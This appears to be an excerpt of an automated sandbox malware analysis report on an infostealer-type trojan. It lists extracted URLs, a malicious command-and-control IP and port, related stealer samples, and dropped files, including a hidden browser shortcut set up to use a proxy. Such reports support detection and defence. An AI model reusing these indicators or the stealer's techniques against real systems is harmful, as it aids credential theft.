http://tempuri.org/Entity/Id18 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id16 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id5Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id17 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id15 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id19 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id11 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id15ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id16Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id10Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id11ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id1Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id18 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id14 | 1% | Virustotal | | Browse
                          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
5.42.92.179:18418 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id14ResponseD | RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id23ResponseD | RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id12Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/ | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id2Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id21Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id9 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id8 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id6ResponseD | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id5 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id4 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id7 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id6 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id19Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id13ResponseD | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1650352774.0000000005EEB000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id15Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id5ResponseD | RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id6Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ip.sb/ip | powershell.exe, 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/sc | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id1ResponseD | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id9Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id20 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id21 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Entity/Id22 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1 | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id23 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | f6FauZ2CEz.exe | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id24 | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id24Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id1Response | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay | RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • 1%, Virustotal, Browse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id11RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id12RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 2%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id13RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id14RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id15RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id16RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id17RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • 1%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id18RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • 1%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id19RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id15ResponseDRegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id11ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
5.42.92.179 | unknown | Russian Federation | 39493 | RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431938
Start date and time: 2024-04-26 02:41:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: f6FauZ2CEz.exe (renamed because the original name is a hash value)
Original Sample Name: 1544dbca0efc2c0105dd7d52a21a8891.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@13/15@0/1
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 276
• Number of non-executed functions: 45
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegAsm.exe, PID 7276 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1188 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
Time | Type | Description
02:41:53 | API Interceptor | 34x Sleep call for process: powershell.exe modified
02:42:13 | API Interceptor | 12x Sleep call for process: RegAsm.exe modified
No context
No context
Match: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU (ASN name)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | PureLog Stealer, RisePro Stealer, zgRAT | 45.15.156.9
file.exe | malicious | RedLine | 5.42.65.96
file.exe | malicious | Unknown | 5.42.66.10
file.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | 5.42.66.10
file.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT | 5.42.66.10
file.exe | malicious | RedLine | 5.42.65.96
c3nBx2HQG2.exe | malicious | Glupteba, Mars Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar, zgRAT | 5.42.66.10
file.exe | malicious | RedLine | 5.42.65.96
file.exe | malicious | RedLine | 5.42.65.50
HwJWf67Y5h.exe | malicious | RedLine | 5.42.65.50
No context
No context
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:27 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2104
                                                                                                                                  Entropy (8bit):3.4581108461027115
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8SfdqTWSxRYrnvPdAKRkdAGdAKRFdAKR/U:8Sce
                                                                                                                                  MD5:C8DF84C9AE6CEAEDD6A5CF8F0B1D170E
                                                                                                                                  SHA1:2CF37132532775C2FD5C1D768B1FAF582C205DCC
                                                                                                                                  SHA-256:AF2C9B10A04BE4CD801280F033AF7FBB459DE5B1072E349A3F3F165D05215DC5
                                                                                                                                  SHA-512:C108900EE14A363C954354050EADF400CDDFB759D3DB7B120C3202A132A94ACD1FC537D810FC5690C36A578BA8E02B295D60BA889F44FB0A0AB0D072C8A3F8CD
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ......,..............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWN`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWN`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWN`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWH`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3274
                                                                                                                                  Entropy (8bit):5.3318368586986695
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
